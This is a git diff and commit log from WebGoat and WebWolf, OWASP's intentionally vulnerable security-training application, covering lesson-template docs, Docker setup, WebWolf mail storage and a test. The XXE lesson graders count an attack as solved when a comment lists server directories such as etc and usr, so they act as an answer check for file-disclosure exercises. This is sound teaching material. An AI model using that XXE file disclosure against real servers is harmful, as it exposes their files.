+    * The `defaultRanking` will move your lesson up or down in the categories list.  
+    * Implement a new key name pair `lesson-template.title` (the key) and update the same key/value pair `your.key=your value` in src/main/resources/i18n/WebGoatLabels.properties.  
+    * Implement a new value for the `getId` method, which leads us to...  
+
+2. The HTML content framing  
+
+    * Rename the provided file in src/main/resources/html using your value from the `getId` method in your lesson's base class:  
+	e.g.   
+	`public String getId() { return "your-lesson";  }` >> `your-lesson.html`   
+    * Modify that file following the commented instructions in there.   
+    * In conjunction with this file you.  
+
+3. Assignment Endpoints    
+    * In the above html file, you will see an example of an 'attack form'. You can create endpoints to handle these attacks and provide the user feedback and simulated output. See the example file here as well as other existing lessons for ways to extend these.  You will extend the `AssignmentEndpoint` as the example will show:  
+    * You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
+    * See other lesson examples for creating unit/integration tests for your project as well.
+
+
+4. Getting your lesson to show up  
+
+    * Modify the webgoat-lessons/pom.xml to include your project in the `<modules>` section:  
+        ```xml
+	  <modules>
+	             <!-- ... -->
+	     <module>webgoat-lesson-template</module>
+		     <!-- ... -->
+	  </modules>
+        ```
+	
+    * Modify the webgoat-server/pom.xml to add your project as a dependency in the `<dependencies>` section:   
+       ```xml
+         <dependencies>
+	             <!-- .... >
+           <dependency>
+              <groupId>org.owasp.webgoat.lesson</groupId>
+              <artifactId>your-artfifact-id-here</artifactId>
+              <version>${project.version}</version>
+           </dependency>
+                     <!-- .... >
+        </dependencies>
+    ```
+        
+
+5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template
--- a/webgoat-lessons/webgoat-lesson-template/getting-started.txt
+++ b/webgoat-lessons/webgoat-lesson-template/getting-started.txt
@ -1,55 +0,0 @@
-##### To include lesson template in build #####
-1. edit theh webgoat-server/pom.xml file and uncomment the section under ...
-<!--uncommment below to run/include lesson template in WebGoat Build-->
-
-2. Also uncomment in webgoat-lessons/pom.xml where it says ...
-<!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
-
-##### To add a lesson to WebGoat #####
-
-There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
-
-0. The POM file
-	a. change the ...
-	<artifactId>webgoat-lesson-template</artifactId>
-	... line to give your lesson its own artifactId.That should be all you need to do there
-
-1.	The Base Class ...
-        a. The name of the class (file and class name) to better match your lesson (e.g. sql-injection >> SqlInjection)
-        b. the category in which you want your lesson to be in.  You can create a new category if you want, or put in an issue to have one added
-        c. The 'defaultRanking' will move your lesson up or down in the categories list
-        d. implement a new key name pair "lesson-template.title" (the key) and update the same key/value pair (your.key=your value) in src/main/resources/i18n/WebGoatLabels.properties
-        e. Implement a new value for the getId method, which leads us to ...
-
-2. The HTML content framing ...
-	a. Rename the provided file in src/main/resources/html using your value from the getId method in your lesson's base class (e.g. public String getId() { return "your-lesson";  } >> "your-lesson.html")
-	b. Modify that file following the commented instructions in there
-	c. In conjunction with this file you
-
-3. Assignment Endpoints
-	a. In the above html file, you will see an example of an 'attack form'.  You can create endpoints to handle these attacks and provide the user feedback and simulated output.  See the example file here as well as other existing lessons for ways to extend these.  You will extend the AssignmentEndpoint as the example will show
-	b. You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
-	c. See other lesson examples for creating unit/integration tests for your project as well
-
-
-4. Getting your lesson to show up
-	a. modify the webgoat-lessons/pom.xml to include your project in the <modules> section
-	<modules>
-		<!-- ... -->
-		<module>webgoat-lesson-template</module>
-		<!-- ... -->
-	</modules>
-
-	b. modify the webgoat-server/pom.xml to add your project as a dependency in the <dependencies> section ...
-	<dependencies>
-		<!-- .... >
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>your-artfifact-id-here</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <!-- .... >
-    <dependencies>
-
-
-5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/plugin/WebWolfIntroduction.java
+++ b/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/plugin/WebWolfIntroduction.java
@ -48,7 +48,7 @@ public class WebWolfIntroduction extends NewLesson {

    @Override
    public Integer getDefaultRanking() {
-        return 1;
+        return 10;
    }

    @Override
--- a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
+++ b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
@ -23,9 +23,9 @@ java -jar webwolf-<<version>>.jar
 WebWolf is also available as a Docker container:

 ```
-docker pull webwolf/webwolf-8.0
+docker pull webgoat/webwolf
 docker run -it 8081:8081 /home/webwolf/run.sh
 ```

-This will start the application on port 8081, in your browser type: `http://localhost:8081/WebWolf`
-You will be redirected to the login page where you need to login with your WebGoat username and password
+This will start the application on port 8081, click webWolfLink:here[] to open WebWolf.
+First thing you need to do is register a new user within WebWolf.
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
@ -46,7 +46,7 @@ import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
@AssignmentHints({"xxe.hints.content.type.xxe.1", "xxe.hints.content.type.xxe.2"})
 public class ContentTypeAssignment extends AssignmentEndpoint {

-    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "opt", "var"};
+    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"}; 
    private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};


@ -85,7 +85,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
    }

   private boolean checkSolution(Comment comment) {
-        String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
+       String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
       boolean success = true;
       for (String directory : directoriesToCheck) {
           success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
@ -54,7 +54,7 @@ import static org.springframework.web.bind.annotation.RequestMethod.POST;
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4"})
 public class SimpleXXE extends AssignmentEndpoint {

-    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "opt", "var"};
+    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
    private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};

    @Value("${webgoat.server.directory}")
@ -77,12 +77,11 @@ public class SimpleXXE extends AssignmentEndpoint {
        }
        return trackProgress(failed().output(error).build());
    }
-
    private boolean checkSolution(Comment comment) {
-        String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
+       String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
       boolean success = true;
       for (String directory : directoriesToCheck) {
-            success &= comment.getText().contains(directory);
+           success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
       }
       return success;
   } 
--- a/webgoat-server/Dockerfile
+++ b/webgoat-server/Dockerfile
@ -2,13 +2,14 @@ FROM openjdk:8-jre-slim

 ARG webgoat_version=8.0-SNAPSHOT

-RUN useradd --home-dir /home/webgoat --create-home -U webgoat
-
-RUN apt-get update; apt-get install curl -y
-
-COPY start.sh /home/webgoat/start.sh
-RUN chmod +x /home/webgoat/start.sh
+RUN \
+  apt-get update && apt-get install && \
+  useradd --home-dir /home/webgoat --create-home -U webgoat && \
+  cd /home/webgoat/; mkdir -p .webgoat

 USER webgoat
-RUN cd /home/webgoat/; mkdir -p .webgoat
 COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar
+
+ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar", "--server.address=0.0.0.0"]
+
+EXPOSE 8080
--- a/webgoat-server/start.sh
+++ b/webgoat-server/start.sh
@ -1,3 +0,0 @@
-#!/bin/sh
-
-java -jar -Djava.security.egd=file:/dev/./urandom /home/webgoat/webgoat.jar
--- a/webwolf/Dockerfile
+++ b/webwolf/Dockerfile
@ -2,12 +2,13 @@ FROM openjdk:8-jre-slim

 ARG webwolf_version=8.0-SNAPSHOT

-RUN useradd --home-dir /home/webwolf --create-home -U webwolf
-
-RUN apt-get update; apt-get install curl -y
-
-COPY start.sh /home/webwolf/start.sh
-RUN chmod +x /home/webwolf/start.sh
+RUN \
+  apt-get update && apt-get install && \
+  useradd --home-dir /home/webwolf --create-home -U webwolf

 USER webwolf
 COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
+
+ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.address=0.0.0.0"]
+
+EXPOSE 8081
--- a/webwolf/pom.xml
+++ b/webwolf/pom.xml
@ -78,6 +78,13 @@
            <artifactId>hsqldb</artifactId>
            <version>${hsqldb.version}</version>
        </dependency>
+
+        <!-- ************* START: Dependencies for Unit and Integration Testing ************** -->
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
    </dependencies>

    <build>
--- a/webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java
+++ b/webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java
@ -1,12 +1,9 @@
 package org.owasp.webwolf.mailbox;

-import lombok.AllArgsConstructor;
-import lombok.Builder;
 import lombok.Data;
 import lombok.NoArgsConstructor;

-import javax.persistence.Entity;
-import javax.persistence.Id;
+import javax.persistence.*;
 import java.io.Serializable;
 import java.time.LocalDateTime;
 import java.time.format.DateTimeFormatter;
@ -15,16 +12,16 @@ import java.time.format.DateTimeFormatter;
 * @author nbaars
 * @since 8/20/17.
 */
-@Builder
@Data
@Entity
@NoArgsConstructor
-@AllArgsConstructor
 public class Email implements Serializable {

    @Id
-    private String id;
+    @GeneratedValue(strategy = GenerationType.IDENTITY)
+    private Long id;
    private LocalDateTime time;
+    @Column(length = 1024)
    private String contents;
    private String sender;
    private String title;
@ -45,4 +42,5 @@ public class Email implements Serializable {
    public String getShortSender() {
        return sender.substring(0, sender.indexOf("@"));
    }
+
 }
--- a/webwolf/src/main/resources/application.properties
+++ b/webwolf/src/main/resources/application.properties
@ -3,6 +3,7 @@ server.error.path=/error.html
 server.session.timeout=6000
 #server.contextPath=/WebWolf
 server.port=8081
+server.address=127.0.0.1
 server.session.cookie.name = WEBWOLFSESSION

 spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/data/webwolf
@ -29,7 +30,8 @@ multipart.location=${java.io.tmpdir}
 multipart.max-file-size=1Mb
 multipart.max-request-size=1Mb

-webgoat.server.directory=${user.home}/.webgoat/
+webgoat.build.version=@project.version@
+webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webwolf.fileserver.location=${java.io.tmpdir}/webwolf-fileserver

 spring.jackson.serialization.indent_output=true
--- a/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java
+++ b/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java
@ -0,0 +1,49 @@
+package org.owasp.webwolf.mailbox;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
+import org.springframework.test.context.junit4.SpringRunner;
+
+import java.time.LocalDateTime;
+import java.util.List;
+
+import static org.junit.Assert.*;
+
+@DataJpaTest
+@RunWith(SpringRunner.class)
+public class MailboxRepositoryTest {
+
+
+    @Autowired
+    private MailboxRepository mailboxRepository;
+
+    @Test
+    public void emailShouldBeSaved() {
+        Email email = new Email();
+        email.setTime(LocalDateTime.now());
+        email.setTitle("test");
+        email.setSender("test@test.com");
+        email.setContents("test");
+        email.setRecipient("someone@webwolf.org");
+        mailboxRepository.save(email);
+    }
+
+    @Test
+    public void savedEmailShouldBeFoundByReceipient() {
+        Email email = new Email();
+        email.setTime(LocalDateTime.now());
+        email.setTitle("test");
+        email.setSender("test@test.com");
+        email.setContents("test");
+        email.setRecipient("someone@webwolf.org");
+        mailboxRepository.saveAndFlush(email);
+
+        List<Email> emails = mailboxRepository.findByRecipientOrderByTimeDesc("someone@webwolf.org");
+
+        assertThat(emails.size(), CoreMatchers.is(1));
+    }
+
+}
--- a/webwolf/start.sh
+++ b/webwolf/start.sh
@ -1,3 +0,0 @@
-#!/bin/sh
-
-java -jar -Djava.security.egd=file:/dev/./urandom /home/webwolf/webwolf.jar
Author	SHA1	Message	Date
Nanne Baars	58d4b81df2	Wrong image name mentioned in lesson for WebWolf	2018-04-11 20:22:19 +02:00
nbaars	2ae1b4955f	By default binds to ALL network interfaces #431 Fix for Docker not binding to any address by default	2018-01-30 07:18:05 +01:00
nbaars	13a4b69cbe	All lesson flags are displayed while running webgoat 8.0 standalone java file #430	2018-01-29 15:43:19 +01:00
nbaars	98efc1235f	By default binds to ALL network interfaces #431	2018-01-29 15:32:02 +01:00
nbaars	b99b554522	Version: docker 8.0.0.M9 Multiple users can't finalize the same lesson #432	2018-01-29 15:29:48 +01:00
nbaars	04ccf9a422	New release should create a new webgoat directory with version tag inside #423	2018-01-21 17:46:43 +01:00
nbaars	ee11381a63	Fixed database issue mappings	2018-01-21 17:13:28 +01:00
nbaars	2cc6c232e2	Added macro for asciidoc to produce the WebWolf link dynamically depending on configuration	2018-01-15 20:56:59 +01:00
nbaars	dec55d52ca	Replaced quotes with normal character (Version: 8.0.0.M5 Character Encoding Issues #411 )	2018-01-14 13:22:28 +01:00
Noah Hansen	568fa82270	fixed ContentTypeAssignment and SimpleXXE to work with MacOSX	2018-01-13 16:00:11 +00:00
Jason Hilton	bad60c43c0	vagrant-training is where the vagrant file is	2018-01-13 15:55:42 +00:00
nbaars	a6b9235711	SQL Error '-104' in XSS Lesson Page 7 #416	2018-01-10 12:48:45 +01:00
nbaars	253a2f16ed	Unable to see buttons like HTTP request parameters, the HTTP request cookies, and the Java source code #417	2018-01-10 12:04:28 +01:00
nbaars	e801b0917d	Unable to save email send to WebWolf #419	2018-01-10 09:19:20 +01:00
nbaars	ae92ac6808	Changed the Vagrantfile to contain the correct release name Deleted the Vagrant files for setting up dev environment, today it is easy to setup the dev environment yourself to start working.	2018-01-09 12:42:57 +01:00
nbaars	a9ac00a075	Clean up	2018-01-08 23:42:36 +01:00
Nanne Baars	0120c7c3a6	Updating README.md	2018-01-02 22:50:10 +01:00
nbaars	5bbdb8893c	Not making a Docker release is we build develop (putting a tag will create a release which is more a controlled/intuitive way to make a release to Docker) (cherry picked from commit `e3e7ed0`)	2018-01-02 22:20:38 +01:00
nbaars	05d8b590f3	Merge tag '8.0.0' into develop Release 8.0.0	2017-12-30 16:52:24 +01:00
Magicansk	a11e6911cd	Update and rename sol.txt to sol.MD Add md syntax	2017-11-02 13:09:49 +01:00
Magicansk	5614cda0bf	Update getting-started.MD	2017-11-02 13:09:23 +01:00
Magicansk	69d44aed5b	Update and rename getting-started.txt to getting-started.MD Change .txt to .md. Add all the markdown syntax and fixed the xml syntax	2017-11-02 13:09:23 +01:00
misfir3	f6911b49a7	Merge pull request #402 from misfir3/develop more hints/helps cleanup	2017-10-30 09:03:03 -06:00
Jason	24cf806787	more hints/helps cleanup	2017-10-25 18:05:08 -06:00
misfir3	1ac305e9b9	Merge pull request #399 from misfir3/develop #351 - using listenToOnce to get rid of redundant calls	2017-10-25 17:13:11 -06:00
Jason	c6f1c5cd2a	#351 - using listenToOnce to get rid of redundant calls	2017-10-25 17:11:54 -06:00
Magicansk	74218de135	Update README.MD	2017-10-25 21:43:58 +02:00
Sönke	1f6d7fdc39	Update Java Version Solves #385	2017-10-23 23:36:35 +02:00
Sönke	cce1945f23	Fix Apt Error for Google Repository See https://askubuntu.com/questions/724093/no-more-updates-for-google-chrome-apt-get-update-error	2017-10-23 23:35:40 +02:00